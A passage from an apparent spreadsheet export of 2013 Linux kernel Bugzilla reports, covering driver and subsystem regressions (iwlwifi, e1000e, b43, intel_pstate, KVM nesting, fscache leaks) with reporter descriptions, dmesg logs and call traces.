[44532.553356] iwlwifi 0000:03:00.0: FH TRBs(4) = 0x00000000 [44532.553376] iwlwifi 0000:03:00.0: FH TRBs(5) = 0x00000000 [44532.553395] iwlwifi 0000:03:00.0: FH TRBs(6) = 0x00000000 [44532.553415] iwlwifi 0000:03:00.0: FH TRBs(7) = 0x00709056 [44532.553485] iwlwifi 0000:03:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [222,222] [44532.553555] iwlwifi 0000:03:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44532.553626] iwlwifi 0000:03:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [223,223] [44532.553698] iwlwifi 0000:03:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44532.553771] iwlwifi 0000:03:00.0: Q 4 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44532.553843] iwlwifi 0000:03:00.0: Q 5 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44532.553914] iwlwifi 0000:03:00.0: Q 6 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44532.553986] iwlwifi 0000:03:00.0: Q 7 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44532.554059] iwlwifi 0000:03:00.0: Q 8 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44532.554159] iwlwifi 0000:03:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [87,87] [44532.554249] iwlwifi 0000:03:00.0: Q 10 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44532.554326] iwlwifi 0000:03:00.0: Q 11 is active and mapped to fifo 1 ra_tid 0x0000 [52,52] [44532.554397] iwlwifi 0000:03:00.0: Q 12 is active and mapped to fifo 1 ra_tid 0x0000 [107,194] [44532.554478] iwlwifi 0000:03:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44532.554548] iwlwifi 0000:03:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44532.554617] iwlwifi 0000:03:00.0: Q 15 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44532.554686] iwlwifi 0000:03:00.0: Q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44532.554755] iwlwifi 0000:03:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44532.554824] iwlwifi 0000:03:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44532.554893] iwlwifi 0000:03:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44538.659314] iwlwifi 0000:03:00.0: fail to flush all tx fifo queues Q 12 [44538.659326] iwlwifi 0000:03:00.0: Current SW read_ptr 107 write_ptr 194 [44538.659360] iwl data: 00000000: f9 ff e1 ff ff ff ff ff 9c 03 20 e7 ff fb ff ff .......... ..... [44538.659381] iwlwifi 0000:03:00.0: FH TRBs(0) = 0x00000000 [44538.659401] iwlwifi 0000:03:00.0: FH TRBs(1) = 0x801020de [44538.659421] iwlwifi 0000:03:00.0: FH TRBs(2) = 0x00000000 [44538.659441] iwlwifi 0000:03:00.0: FH TRBs(3) = 0x803000de [44538.659460] iwlwifi 0000:03:00.0: FH TRBs(4) = 0x00000000 [44538.659480] iwlwifi 0000:03:00.0: FH TRBs(5) = 0x00000000 [44538.659499] iwlwifi 0000:03:00.0: FH TRBs(6) = 0x00000000 [44538.659519] iwlwifi 0000:03:00.0: FH TRBs(7) = 0x00709060 [44538.659589] iwlwifi 0000:03:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [223,223] [44538.659659] iwlwifi 0000:03:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44538.659729] iwlwifi 0000:03:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [223,223] [44538.659798] iwlwifi 0000:03:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44538.659867] iwlwifi 0000:03:00.0: Q 4 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44538.659936] iwlwifi 0000:03:00.0: Q 5 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44538.660004] iwlwifi 0000:03:00.0: Q 6 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44538.660095] iwlwifi 0000:03:00.0: Q 7 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44538.660165] iwlwifi 0000:03:00.0: Q 8 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44538.660264] iwlwifi 0000:03:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [97,97] [44538.660343] iwlwifi 0000:03:00.0: Q 10 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44538.660418] iwlwifi 0000:03:00.0: Q 11 is active and mapped to fifo 1 ra_tid 0x0000 [52,52] [44538.660495] iwlwifi 0000:03:00.0: Q 12 is active and mapped to fifo 1 ra_tid 0x0000 [107,194] [44538.660571] iwlwifi 0000:03:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44538.660643] iwlwifi 0000:03:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44538.660712] iwlwifi 0000:03:00.0: Q 15 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44538.660781] iwlwifi 0000:03:00.0: Q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44538.660849] iwlwifi 0000:03:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44538.660918] iwlwifi 0000:03:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44538.660987] iwlwifi 0000:03:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0]</t>
  </si>
  <si>
    <t>HP/Compaq NC6000 fan speed regression on 3.7+</t>
  </si>
  <si>
    <t>3.7+</t>
  </si>
  <si>
    <t>2013-04-13 23:45 UTC</t>
  </si>
  <si>
    <t>Ville Syrjala</t>
  </si>
  <si>
    <t>2013-06-24 23:27 UTC</t>
  </si>
  <si>
    <t>Created attachment 98531 [details] Logs and dumps from 3.7.10 and 3.9-rc6 kernels There's a regression in thermal subsystem in 3.7 kernel, which results in fan speed staying after during resume. Other people have seen the problem, although it may be that the exact nature of the bug is a bit different between different machines. Here are the mailing list references: https://lkml.org/lkml/2013/3/2/171 https://lkml.org/lkml/2013/4/13/142 For me on 3.7.10 the symptoms of the bug depend on whether I resume the laptop when it's totally cooled down, or still warm. When the bug occurs, the reported temperature somehow goes out of sync with the trip points, and the cooling device cur_state doesn't always match the fan speed. On 3.9-rc6, there's actually another regression, which causes the fan speed to misbehave already without any suspend/resume cycles. What happens is that the fan speeds up when the temperature rises, but when the temperature comes back down, the fan doesn't slow down. When cooling down, the temperature of the trip points does seem to change due to hysteresis, so some activity happens when the trip points are reached, but somehow the cooling devices don't get turned off. The cooling device cur_state accurately reflects the fan speed in this case. I also tested git://git.kernel.org/pub/scm/linux/kernel/git/rzhang/linux.git thermal but it appears to behave exactly like 3.9-rc6. I've attached a tarball with logs from both bug scenarios on a 3.7.10 kernel. I've included logs from a 3.9-rc6 kernel as well, but as stated you don't actually need to suspend/resume to trigger the misbehavior on 3.9-rc6. The "desc.txt" files inside the tarball describe the steps I took when I collected the logs. The tarball also contains acpidump output.</t>
  </si>
  <si>
    <t>Ethernet not working with ac adapter on lenovo t530</t>
  </si>
  <si>
    <t>2013-04-15 05:52 UTC</t>
  </si>
  <si>
    <t>miramir</t>
  </si>
  <si>
    <t>2013-11-13 21:08 UTC</t>
  </si>
  <si>
    <t>Created attachment 98691 [details] kernel-config-x86_64-3.7.10-gentoo-r1-v2 with kernel 3.8 and the associated power can not connect to the network, if you switch to battery it works fine. With the 3.7 kernel is always on. Wifi works fine on both version kernel. distributiv: gentoo connection manager: wicd-1.7.2.4 configs kernel in attachments lspci: 00:00.0 Host bridge: Intel Corporation 3rd Gen Core processor DRAM Controller (rev 09) 00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09) 00:14.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB xHCI Host Controller (rev 04) 00:16.0 Communication controller: Intel Corporation 7 Series/C210 Series Chipset Family MEI Controller #1 (rev 04) 00:16.3 Serial controller: Intel Corporation 7 Series/C210 Series Chipset Family KT Controller (rev 04) 00:19.0 Ethernet controller: Intel Corporation 82579LM Gigabit Network Connection (rev 04) 00:1a.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #2 (rev 04) 00:1b.0 Audio device: Intel Corporation 7 Series/C210 Series Chipset Family High Definition Audio Controller (rev 04) 00:1c.0 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 1 (rev c4) 00:1c.1 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 2 (rev c4) 00:1d.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #1 (rev 04) 00:1f.0 ISA bridge: Intel Corporation QM77 Express Chipset LPC Controller (rev 04) 00:1f.2 SATA controller: Intel Corporation 7 Series Chipset Family 6-port SATA Controller [AHCI mode] (rev 04) 00:1f.3 SMBus: Intel Corporation 7 Series/C210 Series Chipset Family SMBus Controller (rev 04) 02:00.0 System peripheral: Ricoh Co Ltd PCIe SDXC/MMC Host Controller (rev 05) 03:00.0 Network controller: Intel Corporation Centrino Ultimate-N 6300 (rev 3e)</t>
  </si>
  <si>
    <t>Intel 82579LM Gigabit Network adapter deactivated on boot, has to be activated separately</t>
  </si>
  <si>
    <t>2013-04-15 06:56 UTC</t>
  </si>
  <si>
    <t>Harvey</t>
  </si>
  <si>
    <t>I have a Fujitsu Laptop E751 vPro. According to lspci the network adapter is: 00:19.0 Ethernet controller: Intel Corporation 82579LM Gigabit Network Connection (rev 04) The kernel uses e1000e as the kernel driver. When I boot my latop with kernel 3.8.7 and a network cable plugged in, the Adaper is down. 'Ip addr show' says: 4: eth0: &lt;NO-CARRIER,BROADCAST,MULTICAST,UP&gt; mtu 1500 qdisc pfifo_fast state DOWN qlen 1000 link/ether 5c:9a:d8:e7:c1:c8 brd ff:ff:ff:ff:ff:ff I googled around a bit and found that e1000e had some bugs in the past, but all should be fixed now. Issuing 'echo on &gt; /sys/bus/pci/devices/0000\:00\:19.0/power/control' on a shell gets the adapter up and working without problems. All other mentioned things do not work. Unplugging and replugging, sending system to standby and waking it again a.s.o.</t>
  </si>
  <si>
    <t>Framebuffer on boot causes brightness to go to minimum on HP laptop</t>
  </si>
  <si>
    <t>2013-04-15 19:35 UTC</t>
  </si>
  <si>
    <t>2013-11-13 02:10 UTC</t>
  </si>
  <si>
    <t>Hi, FYI: On my Pavilion G6 going into framebuffer causes the screen to dim to lowest brightness setting. I can manually increase it after this time using the buttons if I install the modules (which all distros bundle). Caused when going into framebuffer for the first time on boot. Resolves itself sometimes when going into X. product: HP Pavilion g6 Notebook PC (A9W47EA#ABU) Display section of lshw: *-display description: VGA compatible controller product: 2nd Generation Core Processor Family Integrated Graphics Controller vendor: Intel Corporation physical id: 2 bus info: pci@0000:00:02.0 version: 09 width: 64 bits clock: 33MHz capabilities: msi pm vga_controller bus_master cap_list rom configuration: driver=i915 latency=0 resources: irq:42 memory:c0000000-c03fffff memory:b0000000-bfffffff ioport:4000(size=64) Not a regression afaik as I've always noticed it. Low priority as easily worked around (just confusing why it happens). Happens on any kernel (ubuntu, debian, homebuilt up to 3.6 - not tested on 3.7+). Cheers</t>
  </si>
  <si>
    <t>Using Intel Pstates driver causes panics during high loads</t>
  </si>
  <si>
    <t>3.9-rc</t>
  </si>
  <si>
    <t>2013-04-16 17:31 UTC</t>
  </si>
  <si>
    <t>2013-11-13 21:07 UTC</t>
  </si>
  <si>
    <t>Dirk Brandewie</t>
  </si>
  <si>
    <t>I've already had a conversation via email with Zhang about this The driver has been broken throughout the 3.9 rc series As the issue only manifests during high loads after long periods of time I've been able to bisect the issue I've taken screenshots of the panics Disabling the pstates driver stops the panics The first snapshots date back to the 7th March but the issue was noticed before this I update from Linus' tree nightly</t>
  </si>
  <si>
    <t>ASUS N56VJ Screen Brightness keys not working correctly</t>
  </si>
  <si>
    <t>2013-04-16 22:30 UTC</t>
  </si>
  <si>
    <t>Dan Garton</t>
  </si>
  <si>
    <t>2013-11-28 01:37 UTC</t>
  </si>
  <si>
    <t>Running Ubuntu kernel 3.8.0-17.27 (apparently based off 3.8.5). wKeys Working better than ever before, definitely - the fn-f5 and fn-f6 buttons now changing with gnome/unity indications for the first time - though the range is only between 85% and 96% according to `cat /sys/class/backlight/acpi_video0/brightness` - only those two discrete values. (Aaron: "That probably is due to the broken implementation of _BQC in this system's BIOS.") (Ubuntu settings panel brightness control works fine, 0-100%. No dimming on battery discharge though :( ) root@guava:~# ls -al /sys/class/backlight/ total 0 lrwxrwxrwx 1 root root 0 Apr 12 00:10 acpi_video0 -&gt; ../../devices/pci0000:00/0000:00:02.0/backlight/acpi_video0 lrwxrwxrwx 1 root root 0 Apr 12 00:14 intel_backlight -&gt; ../../devices/pci0000:00/0000:00:02.0/drm/card0/card0-LVDS-1/intel_backlight echo x &gt; /sys/class/backlight/acpi_video0/brightness also works fine, values 0-100.</t>
  </si>
  <si>
    <t>MAP_HUGETLB mmap fails for certain sizes</t>
  </si>
  <si>
    <t>3.5.0-27</t>
  </si>
  <si>
    <t>2013-04-20 03:00 UTC</t>
  </si>
  <si>
    <t>iceman_dvd</t>
  </si>
  <si>
    <t>2013-11-13 21:02 UTC</t>
  </si>
  <si>
    <t>This is on an Ubuntu 12.10 desktop, but the same issue has been found on 12.04 with 3.5.0 kernel. See the sample program. An allocation with MAP_HUGETLB consistently fails with certain sizes, while it succeeds with others. The allocation sizes are well below the number of free huge pages. $ uname -a Linux davide-lnx2 3.5.0-27-generic #46-Ubuntu SMP Mon Mar 25 19:58:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux # echo 100 &gt; /proc/sys/vm/nr_hugepages # cat /proc/meminfo ... AnonHugePages: 0 kB HugePages_Total: 100 HugePages_Free: 100 HugePages_Rsvd: 0 HugePages_Surp: 0 Hugepagesize: 2048 kB $ ./mmappu $((5 * 2 * 1024 * 1024 - 4096)) size=10481664 0x9ff000 hugepage mmap: Invalid argument $ ./mmappu $((5 * 2 * 1024 * 1024 - 4095)) size=10481665 0x9ff001 OK! It seems the trigger point is a normal page size. The same binary works flawlessly in previous kernels.</t>
  </si>
  <si>
    <t>[nested virt] L1 CPU Stuck when booting a L2 guest</t>
  </si>
  <si>
    <t>3.9.0-rc3</t>
  </si>
  <si>
    <t>2013-04-22 14:32 UTC</t>
  </si>
  <si>
    <t>2013-05-29 07:46 UTC</t>
  </si>
  <si>
    <t>Created attachment 99651 [details] call trace in L1 guest Environment: ------------ Host OS (ia32/ia32e/IA64):ia32e Guest OS (ia32/ia32e/IA64):ia32e Guest OS Type (Linux/Windows):Linux kvm.git next Commit:c0d1c770c05ac7051df86914f9627b68f29c1d67 qemu-kvm.git Commit:8912bdea01e8671e59fe0287314379be9c1f40ec Host Kernel Version:3.9.0-rc3 Hardware: Sandy Bridge - EP Bug detailed description: -------------------------- create L1 guest with "-cpu host", then create a L2 guest. We found CPU Stuck in L1 guest when booting L2 guest. This should be a regression. kvm(next)+ qemu-kvm = result 188424ba + 8912bdea = good c0d1c770 + 8912bdea = bad Reproduce steps: ---------------- 1. create L1 guests: qemu-system-x86_64 --enable-kvm -m 10240 -smp 8 -net nic,macaddr=00:12:45:67:2B:1C -net tap,script=/etc/kvm/qemu-ifup nested-kvm-rhel6u4.qcow -cpu host 2. create L2 guest qemu-system-x86_64 --enable-kvm -m 1024 -smp 2 -net none rhel6u4.img Current result: ---------------- L1 call trace (CPU Stuck) Expected result: ---------------- L1 and L2 work fine Basic root-causing log: ---------------------- [ 312.158002] BUG: soft lockup - CPU#7 stuck for 22s! [qemu-system-x86:2353] [ 312.158002] Modules linked in: bridge nfsv3 nfs_acl nfsv4 auth_rpcgss nfs fuse fscache dns_resolver lockd sunrpc 8021q garp stp llc binfmt_misc uinput ppdev parport_pc parport kvm_intel kvm crc32c_intel ghash_clmulni_intel microcode pcspkr e1000 cirrus ttm drm_kms_helper drm i2c_piix4 i2c_core floppy(F) [ 312.158002] CPU 7 [ 312.158002] Pid: 2353, comm: qemu-system-x86 Tainted: GF 3.8.5 #1 Bochs Bochs [ 312.158002] RIP: 0010:[&lt;ffffffff810c0982&gt;] [&lt;ffffffff810c0982&gt;] smp_call_function_many+0x202/0x270 [ 312.158002] RSP: 0018:ffff88027a21dce8 EFLAGS: 00000202 [ 312.158002] RAX: 0000000000000008 RBX: 000800008ede8700 RCX: 0000000000000004 [ 312.158002] RDX: 0000000000000004 RSI: 0000000000000080 RDI: 0000000000000292 [ 312.158002] RBP: ffff88027a21dd38 R08: ffff88029fdd4890 R09: 0000000000000080 [ 312.158002] R10: 0000000000000002 R11: 0000000000000000 R12: 0000000000000292 [ 312.158002] R13: 0000000000000001 R14: ffffea0009e34640 R15: 0040000000080008 [ 312.158002] FS: 00007ff26ef41700(0000) GS:ffff88029fdc0000(0000) knlGS:0000000000000000 [ 312.158002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 312.158002] CR2: 00007ff271248000 CR3: 00000002902a7000 CR4: 00000000000427e0 [ 312.158002] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 312.158002] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 312.158002] Process qemu-system-x86 (pid: 2353, threadinfo ffff88027a21c000, task ffff88027d368000) [ 312.158002] Stack: [ 312.158002] ffff88027d368000 01ff88027d368000 ffff88027a21dd48 ffffffff8104f110 [ 312.158002] 00007ff23fffffff ffff88028ede89c0 ffff88028ede8700 00007ff267dff000 [ 312.158002] ffff88027a21de18 00007ff268000000 ffff88027a21dd68 ffffffff8104ed5e [ 312.158002] Call Trace: [ 312.158002] [&lt;ffffffff8104f110&gt;] ? flush_tlb_mm_range+0x250/0x250 [ 312.158002] [&lt;ffffffff8104ed5e&gt;] native_flush_tlb_others+0x2e/0x30 [ 312.158002] [&lt;ffffffff8104ef30&gt;] flush_tlb_mm_range+0x70/0x250 [ 312.158002] [&lt;ffffffff8115d822&gt;] tlb_flush_mmu+0xa2/0xb0 [ 312.158002] [&lt;ffffffff8115e15c&gt;] tlb_finish_mmu+0x1c/0x50 [ 312.158002] [&lt;ffffffff8116552a&gt;] unmap_region+0xea/0x110 [ 312.158002] [&lt;ffffffff811672c2&gt;] ? __split_vma+0x1e2/0x230 [ 312.158002] [&lt;ffffffff81167c14&gt;] do_munmap+0x274/0x3a0 [ 312.158002] [&lt;ffffffff81167d91&gt;] vm_munmap+0x51/0x80 [ 312.158002] [&lt;ffffffff81167dec&gt;] sys_munmap+0x2c/0x40 [ 312.158002] [&lt;ffffffff81653999&gt;] system_call_fastpath+0x16/0x1b [ 312.158002] Code: a6 58 00 0f ae f0 4c 89 e7 ff 15 e2 08 b6 00 80 7d bf 00 0f 84 89 fe ff ff f6 43 20 01 0f 84 7f fe ff ff 66 0f 1f 44 00 00 f3 90 &lt;f6&gt; 43 20 01 75 f8 e9 6c fe ff ff 0f 1f 00 4c 89 ea 4c 89 f6 44</t>
  </si>
  <si>
    <t>icmp redirects are being ignored</t>
  </si>
  <si>
    <t>2013-04-24 09:59 UTC</t>
  </si>
  <si>
    <t>Per Jessen</t>
  </si>
  <si>
    <t>2013-11-13 20:57 UTC</t>
  </si>
  <si>
    <t>We operate a transparent web-cache which uses ICMP redirects to divert clients to the cache. With kernel 3.7.1 (witnessed in installation systems for openSUSE 12.3 and Ubuntu 13.04), ICMP redirects appear to be ignored. Same behaviour seen in 3.8.6. See also https://bugzilla.novell.com/show_bug.cgi?id=814510 Please let me know which kind of diagnostics you require.</t>
  </si>
  <si>
    <t>Observed memory leak while accessing /proc/fs/fscache/stats</t>
  </si>
  <si>
    <t>3.9.0-rc8</t>
  </si>
  <si>
    <t>2013-04-25 08:03 UTC</t>
  </si>
  <si>
    <t>Shyju</t>
  </si>
  <si>
    <t>2013-12-10 06:02 UTC</t>
  </si>
  <si>
    <t>Hi, Observed memory leak while accessing /proc/fs/fscache/stats Kernel Version : 3.9.0-rc8 (Kmemleak enabled) Platform : ATCA board(X86) Steps to reproduce the memory leak 1. Build a Kmemleak enabled kernel 2. mount -t debugfs nodev /sys/kernel/debug/ 3. cat /proc/fs/fscache/stats 4. echo scan &gt; /sys/kernel/debug/kmemleak 5. cat /sys/kernel/debug/kmemleak Its independent of the hardware. Can be reproduced on PC as well Step 5 will give the following memory leak information cat /sys/kernel/debug/kmemleak unreferenced object 0xecd04320 (size 32): comm "cat", pid 2457, jiffies 103889 (age 17.664s) hex dump (first 32 bytes): 70 09 23 c1 d0 09 23 c1 b0 09 23 c1 90 13 f4 f8 p.#...#...#..... 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................ backtrace: [&lt;c11ec610&gt;] create_object+0x100/0x400 [&lt;c16150f3&gt;] kmemleak_alloc+0x73/0x120 [&lt;c11e42ec&gt;] kmem_cache_alloc+0x1bc/0x310 [&lt;c1232633&gt;] single_open+0x33/0xf0 [&lt;f8f4137f&gt;] fscache_stats_open+0x1f/0x30 [fscache] [&lt;c128c491&gt;] proc_reg_open+0xe1/0x230 [&lt;c11efef6&gt;] do_dentry_open+0x446/0x550 [&lt;c11f01c4&gt;] finish_open+0x34/0x80 [&lt;c120dab1&gt;] do_last+0x8e1/0x1a90 [&lt;c120ed66&gt;] path_openat+0x106/0x7c0 [&lt;c12102ca&gt;] do_filp_open+0x3a/0xd0 [&lt;c11f24c3&gt;] do_sys_open+0x1a3/0x370 [&lt;c11f26c1&gt;] sys_open+0x31/0x50 [&lt;c164a086&gt;] sysenter_do_call+0x12/0x28 [&lt;ffffffff&gt;] 0xffffffff Shyju</t>
  </si>
  <si>
    <t>[PATCH]Since 3.8 it's impossible to change MAC address (rt2800pci)</t>
  </si>
  <si>
    <t>3.8.10</t>
  </si>
  <si>
    <t>2013-05-01 13:29 UTC</t>
  </si>
  <si>
    <t>whatever</t>
  </si>
  <si>
    <t>2014-12-12 14:56 UTC</t>
  </si>
  <si>
    <t>0a:00.0 Network controller: Ralink corp. RT2790 Wireless 802.11n 1T/2R PCIe First bad commit is 403e16731ffddc097eae89f53f9a7b0f0c9769c4 Before (55cb079, da29d2a): ifconfig wlp10s0 hw ether XX:XX:XX:XX:XX:XX # no error reported, mac address changes After (403e167): ifconfig wlp10s0 hw ether XX:XX:XX:XX:XX:XX SIOCSIFHWADDR: Invalid argument # mac address doesn't change</t>
  </si>
  <si>
    <t>Radeon HD6950: Resuming from hibernation fails sometimes</t>
  </si>
  <si>
    <t>3.8.13</t>
  </si>
  <si>
    <t>2013-05-01 13:56 UTC</t>
  </si>
  <si>
    <t>Harald Judt</t>
  </si>
  <si>
    <t>2013-08-21 19:49 UTC</t>
  </si>
  <si>
    <t>Mainboard: ASRock Z77 Extreme4 Graphics card: AMD Radeon HD6950 (r600/Cayman) Resuming from hibernation fails sometimes, but resuming from suspend never fails. Observable symptoms when it fails: After reading the complete page1? snapshot, the screen goes black, turns off (no signal) and the system hangs. No ssh or sysreq keys work, everything is frozen dead, leaving the reset button as the only option to get the system back into a working state. This is with the vanilla kernel, starting at least with 3.2-rc8 something, last version tested is 3.8.7. But in production, I'm using identical kernels with the tuxonice patches applied. Now one interesting feature of this is that it allows to retry a failed resume (reading the image again). And this - though it might sometimes need one or two tries - actually works! No filesystem corruption or any other problems. I've spent some time to narrow this down to some module, and it appeared that the issue doesn't happen with nomodeset=1. What's more relevating, is that it is not reproducible with a Radeon HD3650 (RV635 chipset) using the same module. According to the driver developers, for the driver there should be no difference between suspend/hibernate. Any idea what could go wrong here? Any chance getting to work hibernate/resume reliably on that machine with that graphics card? Unfortunately, this is really hard to debug. There seem to be no messages that would help in dmesg, netconsole is no help here, boot messages scroll over the screen extremely fast, too fast to read.</t>
  </si>
  <si>
    <t>3.9-linux-next-20130501: OOPS in intel_pstate_sample</t>
  </si>
  <si>
    <t>2013-05-01 20:59 UTC</t>
  </si>
  <si>
    <t>2013-08-10 13:05 UTC</t>
  </si>
  <si>
    <t>Created attachment 100391 [details] camera picture of the stacktrace This is maybe a dupe of bug #57401 but happened on linux-next-20130501 after I did "dmesg | less". ? pid_param_set intel_pstate_timer_func call_timer_fn ? __internal_add_timer ? pid_param_set run_timer_softirq __do_softirq irq_exit smp_apic_timer_interrupt apic_timer_interrupt ? sysret_check</t>
  </si>
  <si>
    <t>b43 wireless no longer works, MacBook Pro</t>
  </si>
  <si>
    <t>3.8+</t>
  </si>
  <si>
    <t>2013-05-05 03:43 UTC</t>
  </si>
  <si>
    <t>Josh Ernzen</t>
  </si>
  <si>
    <t>2014-11-18 12:00 UTC</t>
  </si>
  <si>
    <t>I've noticed that the WiFi drivers no longer work. I'm using Gentoo and have tried both Gentoo's sources and I've downloaded the kernel from kernel.org with no luck. WiFi seems to have lost functionality with the start of the 3.8 kernel. The 3.9 kernel still has lost functionality. Network controller: Broadcom Corporation BCM4331 802.11a/b/g/n Also, not sure if aware or if it's not possible at the moment, but with the 3.7 kernel, I cannot search for 5GHz networks. Only works with 2.4GHz. When running through the kernel configuration (using "make menuconfig") I've noticed some options missing compared to the 3.7.10-r1 (latest 3.7 kernel being used)when setting up the wireless drivers.</t>
  </si>
  <si>
    <t>Possible circular locking dependency detected</t>
  </si>
  <si>
    <t>3.4.24</t>
  </si>
  <si>
    <t>2013-05-07 06:20 UTC</t>
  </si>
  <si>
    <t>dingtianhong</t>
  </si>
  <si>
    <t>2013-11-13 20:45 UTC</t>
  </si>
  <si>
    <t>Hello! I have the kernel config with CONFIG_PROVE_LOCKING CONFIG_IOSCHED_CFQ CONFIG_PREEMPT_RT_FULL on. When I do some tests with the kernel,it works well, but I notice the following message，the problem happens only once.I have no idea to reproduce it. Apr 20 11:01:28 euler-linux kernel: [ 5913.077149] ====================================================== Apr 20 11:01:28 euler-linux kernel: [ 5913.077150] [ INFO: possible circular locking dependency detected ] Apr 20 11:01:28 euler-linux kernel: [ 5913.077154] 3.4.24.05-0.1-default #1 Not tainted Apr 20 11:01:28 euler-linux kernel: [ 5913.077155] ------------------------------------------------------- Apr 20 11:01:28 euler-linux kernel: [ 5913.077157] ksoftirqd/0/3 is trying to acquire lock: Apr 20 11:01:28 euler-linux kernel: [ 5913.077158] (&amp;ndev-&gt;lock){+.+...}, at: [&lt;ffffffff8147f804&gt;] ipv6_get_lladdr+0x74/0x120 Apr 20 11:01:28 euler-linux kernel: [ 5913.077168] Apr 20 11:01:28 euler-linux kernel: [ 5913.077169] but task is already holding lock: Apr 20 11:01:28 euler-linux kernel: [ 5913.077170] (&amp;mc-&gt;mca_lock){+.+...}, at: [&lt;ffffffff8149d130&gt;] mld_send_report+0x40/0x150 Apr 20 11:01:28 euler-linux kernel: [ 5913.077177] Apr 20 11:01:28 euler-linux kernel: [ 5913.077177] which lock already depends on the new lock. Apr 20 11:01:28 euler-linux kernel: [ 5913.077178] Apr 20 11:01:28 euler-linux kernel: [ 5913.077179] Apr 20 11:01:28 euler-linux kernel: [ 5913.077179] the existing dependency chain (in reverse order) is: Apr 20 11:01:28 euler-linux kernel: [ 5913.077181] Apr 20 11:01:28 euler-linux kernel: [ 5913.077182] -&gt; #1 (&amp;mc-&gt;mca_lock){+.+...}: Apr 20 11:01:28 euler-linux kernel: [ 5913.077184] [&lt;ffffffff810a8027&gt;] validate_chain+0x637/0x730 Apr 20 11:01:28 euler-linux kernel: [ 5913.077191] [&lt;ffffffff810a8417&gt;] __lock_acquire+0x2f7/0x500 Apr 20 11:01:28 euler-linux kernel: [ 5913.077195] [&lt;ffffffff810a8734&gt;] lock_acquire+0x114/0x150 Apr 20 11:01:28 euler-linux kernel: [ 5913.077198] [&lt;ffffffff814f691a&gt;] rt_spin_lock+0x4a/0x60 Apr 20 11:01:28 euler-linux kernel: [ 5913.077203] [&lt;ffffffff8149e4bb&gt;] igmp6_group_added+0x3b/0x120 Apr 20 11:01:28 euler-linux kernel: [ 5913.077206] [&lt;ffffffff8149e5d8&gt;] ipv6_mc_up+0x38/0x60 Apr 20 11:01:28 euler-linux kernel: [ 5913.077209] [&lt;ffffffff81480a4d&gt;] ipv6_find_idev+0x3d/0x80 Apr 20 11:01:28 euler-linux kernel: [ 5913.077212] [&lt;ffffffff81483175&gt;] addrconf_notify+0x3d5/0x4b0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077215] [&lt;ffffffff814fae3f&gt;] notifier_call_chain+0x3f/0x80 Apr 20 11:01:28 euler-linux kernel: [ 5913.077218] [&lt;ffffffff81073471&gt;] raw_notifier_call_chain+0x11/0x20 Apr 20 11:01:28 euler-linux kernel: [ 5913.077224] [&lt;ffffffff813d8722&gt;] call_netdevice_notifiers+0x32/0x60 Apr 20 11:01:28 euler-linux kernel: [ 5913.077230] [&lt;ffffffff813d92d4&gt;] __dev_notify_flags+0x34/0x80 Apr 20 11:01:28 euler-linux kernel: [ 5913.077233] [&lt;ffffffff813d9360&gt;] dev_change_flags+0x40/0x70 Apr 20 11:01:28 euler-linux kernel: [ 5913.077236] [&lt;ffffffff813ea627&gt;] do_setlink+0x237/0x8a0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077240] [&lt;ffffffff813ebb6c&gt;] rtnl_newlink+0x3ec/0x600 Apr 20 11:01:28 euler-linux kernel: [ 5913.077243] [&lt;ffffffff813eb4d0&gt;] rtnetlink_rcv_msg+0x160/0x310 Apr 20 11:01:28 euler-linux 